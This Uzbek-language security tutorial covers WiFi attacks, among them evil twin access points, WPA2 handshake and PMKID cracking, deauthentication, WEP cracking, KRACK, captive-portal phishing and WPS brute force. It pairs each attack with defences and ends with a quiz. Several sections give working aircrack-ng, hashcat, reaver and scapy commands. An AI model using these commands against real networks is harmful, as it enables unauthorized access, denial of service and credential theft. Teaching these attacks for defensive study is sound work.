WiFi Hujumlari
Simsiz tarmoqlarga qarshi hujum va himoya usullari
WiFi tarmoqlari ubiquitous bo'lib qolgan bugungi kunda simsiz hujumlar tobora ko'paymoqda. WEP kriptografiyasining buzilishidan tortib, zamonaviy WPA3 protokoliga qarshi hujumlargacha — simsiz xavfsizlik muhim ahamiyat kasb etadi. Ushbu bo'limda WiFi protokollarining zaifliklari, hujum metodologiyasi va eng yaxshi himoya amaliyotlari ko'rib chiqiladi.
WiFi Xavfsizlik Protokollari Evolyutsiyasi
1. Evil Twin / Rogue Access Point
Evil Twin hujumida tajovuzkor qonuniy WiFi tarmog'ini taqlid qiluvchi soxta access point yaratadi. Qurbonlar soxta tarmoqqa ulanganda barcha trafikni tajovuzkor ko'rishi mumkin. Kafeler, aeroportlar va mehmonxonalar bu hujum uchun eng qulay joylar hisoblanadi.
airodump-ng bilan "CoffeeShop_WiFi" SSID topiladi
Xuddi shu SSID bilan kuchliroq signal orqali AP yaratiladi
Qonuniy AP ga qarshi deauth paketlari yuborib, foydalanuvchilar ulanishi uziladi
Qurbonlar soxta AP ga ulansa, barcha trafik tajovuzkor orqali o'tadi
# Monitor rejimiga o'tish
airmon-ng start wlan0
# Mavjud AP larni skanerlash
airodump-ng wlan0mon
# Soxta AP yaratish (SSID bilan)
airbase-ng -e "CoffeeShop_WiFi" \
-c 6 wlan0mon
# Deauth hujumi (qonuniy AP ga)
aireplay-ng --deauth 0 \
-a wlan0mon
# Hostapd bilan murakkab AP
# hostapd.conf faylida sozlash:
# ssid=FreeWifi
# wpa=0 (ochiq tarmoq)
Faqat o'z tarmog'ingizda yoki ruxsat berilgan muhitda ishlating!
- ✓ Ochiq WiFi da VPN ishlating
- ✓ HTTPS Only saytlarga kiring
- ✓ WiFi avtomatik ulanishni o'chiring
- ✓ Sertifikat ogohlantirishlariga e'tibor bering
- ✓ 802.11w (Management Frame Protection)
- ✓ WPA3-SAE ishlatish
2. WPA/WPA2 Handshake Capture va Cracking
WPA2 da foydalanuvchi ulanganda 4-way handshake almashinuvi amalga oshiriladi. Bu handshake ushlanib, offline brute-force bilan parol topilishi mumkin. Parol kuchsiz bo'lsa, bu hujum muvaffaqiyatli bo'ladi.
# 1. Monitor mode
airmon-ng start wlan0
# 2. Tarmoqlarni skanerlash
airodump-ng wlan0mon
# 3. Target AP skanerlash + cap fayl
airodump-ng -c 6 \
--bssid AA:BB:CC:DD:EE:FF \
-w /tmp/capture wlan0mon
# 4. Deauth (handshake uchun)
aireplay-ng --deauth 5 \
-a AA:BB:CC:DD:EE:FF wlan0mon
# 5. Parol cracking - hashcat
hashcat -m 22000 capture.hc22000 \
rockyou.txt
# 6. John the Ripper bilan
hccap2john capture.cap > hash.txt
john hash.txt --wordlist=rockyou.txt
Clientless — foydalanuvchi ulangan bo'lmasa ham ishlaydi!
# hcxdumptool bilan
hcxdumptool -o dump.pcapng \
-i wlan0mon --enable_status=3
# PMKID ajratish
hcxpcaptool -z hash.txt dump.pcapng
# Cracking
hashcat -m 22000 hash.txt wordlist.txt
- ✓ Kuchli parol: 12+ belgi, aralash (harf+raqam+belgi)
- ✓ WPA3 SAE: offline cracking imkonini yo'q qiladi
- ✓ 802.1X / Enterprise: har bir foydalanuvchiga alohida autentifikatsiya
- ✓ Passphrase ning dictionary'da bo'lmasligini tekshiring
3. Deauthentication Hujumi (WiFi DoS)
WiFi 802.11 standartida Management Frame lar himoyalanmagan. Tajovuzkor soxta deauth paketlari yuborib, foydalanuvchilarni tarmoqdan uzib tashlashi mumkin. Bu Evil Twin hujumining ajralmas qismi hamdir.
# Barcha clientlarni uzib tashlash
aireplay-ng --deauth 0 \
-a wlan0mon
# Bitta clientni uzish
aireplay-ng --deauth 10 \
-a \
-c wlan0mon
# mdk4 bilan keng hujum
mdk4 wlan0mon d -b blacklist.txt
# scapy bilan Python script
from scapy.all import *
dot11 = Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2="aa:bb:cc:dd:ee:ff",
addr3="aa:bb:cc:dd:ee:ff")
frame = RadioTap()/dot11/Dot11Deauth(reason=7)
sendp(frame, iface="wlan0mon", count=100)
# Hostapd konfiguratsiyasida PMF yoqish
# /etc/hostapd/hostapd.conf
ieee80211w=2 # Majburiy
# 0 = O'chirilgan
# 1 = Ixtiyoriy
# 2 = Majburiy
# WPA3 da PMF avtomatik majburiy
# Cisco AP konfiguratsiyasi
wlan security pmf required
# Router sozlamalarida:
# "Management Frame Protection" = Required
802.11w (PMF) — Management Frame Protection. Deauth paketlarini kriptografik imzolash orqali soxta paketlarni bloklaydi. WPA3 da majburiy.
4. WEP Cracking
WEP (1999) RC4 shifrlashidan foydalanadi va IV (Initialization Vector) zaifligiga ega. Aircrack-ng bilan 5000 paket yig'ib, bir necha minutda buziladigan standart.
# WEP hujumi - aircrack-ng suite
airmon-ng start wlan0
airodump-ng -c 6 --bssid \
-w wep_cap wlan0mon
# ARP Replay (tezlashtirilgan)
aireplay-ng --arpreplay \
-b wlan0mon
# 25000+ paket yig'ilganda
aircrack-ng wep_cap*.cap
# Natija: KEY FOUND! [ 1A:2B:3C:4D:5E ]
WEP hali ishlatilmoqdami?
2024-yil ma'lumotiga ko'ra, dunyo bo'yicha hali 3% tarmoq WEP ishlatmoqda. Bu jiddiy xavfsizlik muammosi.
5. KRACK Hujumi (WPA2)
KRACK (Key Reinstallation Attack) — 2017-yil Mathy Vanhoef tomonidan kashf etilgan WPA2 zaiflik. 4-way handshake da nonce qayta ishlatilishi orqali shifrlangan trafikni ochish mumkin.
Android va Linux qurilmalar ayniqsa zaif edi. All-zero encryption key reinstallation mumkin edi.
Android 6+, macOS, Linux, Windows — deyarli barcha WPA2 qurilmalar ta'sirlangan edi.
2017-yil oktyabr — barcha asosiy OS lar patch chiqardi. WPA3 bu zaiflikni butunlay hal qildi.
6. Captive Portal va KARMA Hujumi
Captive Portal hujumida tajovuzkor soxta WiFi tarmoq yaratibi, ulanishdan keyin login sahifasi ko'rsatadi va foydalanuvchidan credentials so'raydi. KARMA hujumida esa qurilmaning "avval ulangan tarmoqlar" ro'yxatidan foydalanib, avtomatik ulanish qo'lga olinadi.
- 1. Mashhur SSID bilan ochiq AP yaratish
- 2. Barcha trafikni 192.168.1.1 ga yo'naltirish
- 3. Soxta login sahifasi (Facebook, Google, bank)
- 4. Qurbon parol kiritganda ushlab qolish
- 5. Haqiqiy saytga yo'naltirish (shubha yo'q)
hostapd-wpe va wifiphisher framework'lari bu hujumni avtomatlashtiradi.
# Qurilmaning Probe Request
# -------------------------------------------
# Telefon: "FreeAirport_WiFi" bormi?
# KARMA AP: "Ha, men FreeAirport_WiFi man!"
# Telefon: (avtomatik ulanadi)
# Hostapd KARMA rejimi
# hostapd-karma.conf:
# karma=1 # Har qanday SSID ga javob
# hcxtools bilan:
hcxdumptool -i wlan0mon \
--enable_status=15
- • Eskilgan WiFi profillarini o'chiring
- • WiFi "Auto-join" ni o'chiring
- • Ochiq WiFi da VPN majburiy
7. WPS PIN Brute-Force (Reaver)
WPS (Wi-Fi Protected Setup) 8 xonali PIN tizimi dizayn bo'yicha zaif. PIN 2 qismga bo'linib tekshirilishi sababli, 11,000 ta urinish bilan butunlay buziladie (2011, Stefan Viehbock).
# WPS yoqilgan AP lar
wash -i wlan0mon
# Reaver bilan PIN brute-force
reaver -i wlan0mon \
-b \
-vv \
--no-associate
# Pixie Dust hujumi (tezroq)
# Ba'zi routerlarda pseudo-random seed
reaver -i wlan0mon \
-b \
-vv \
-K 1 # Pixie Dust mode
# Bully bilan alternativa
bully wlan0mon \
-b \
-d -v 3
- ✓ Routerda WPS ni O'CHIRING
- ✓ WPS Lock-out (10 xato keyin bloklash)
WiFi Xavfsizlik Standartlari Taqqoslash
| Protokol | Yil | Shifrlash | Asosiy Zaiflik | Holat |
|---|---|---|---|---|
| WEP | 1999 | RC4 (40/104 bit) | IV collision, aircrack | ❌ Eskirgan |
| WPA | 2003 | TKIP (128 bit) | TKIP zaiflik, wordlist | ⚠️ Eskirgan |
| WPA2-Personal | 2004 | AES-CCMP (128 bit) | KRACK, PMKID, zaif parol | ⚡ Keng tarqalgan |
| WPA2-Enterprise | 2004 | AES-CCMP + 802.1X | RADIUS server zaiflik | ✅ Korporativ uchun |
| WPA3-Personal | 2018 | SAE (192 bit) | Dragonblood (2019, tuzatildi) | ✅ Tavsiya etiladi |
| WPA3-Enterprise | 2018 | AES-256-GCMP + 802.1X | Noma'lum jiddiy zaiflik | ✅ Eng xavfsiz |
Bilimingizni Sinang
1. WPS PIN hujumida nechta maksimal urinish kerak?
- A) 100,000,000
- B) 11,000 ✓ — PIN ikkiga bo'linib tekshiriladi
- C) 10,000,000
- D) 1,000
2. KRACK hujumi qaysi WiFi protokolga qarshi?
- A) WEP
- B) WPA
- C) WPA2 ✓ — 4-way handshake nonce reinstallation
- D) WPA3
3. Deauthentication hujumidan himoya qiluvchi 802.11 standart qo'shimchasi qaysi?
- A) 802.11n
- B) 802.11ac
- C) 802.11w (PMF) ✓ — Management Frame Protection
- D) 802.11ax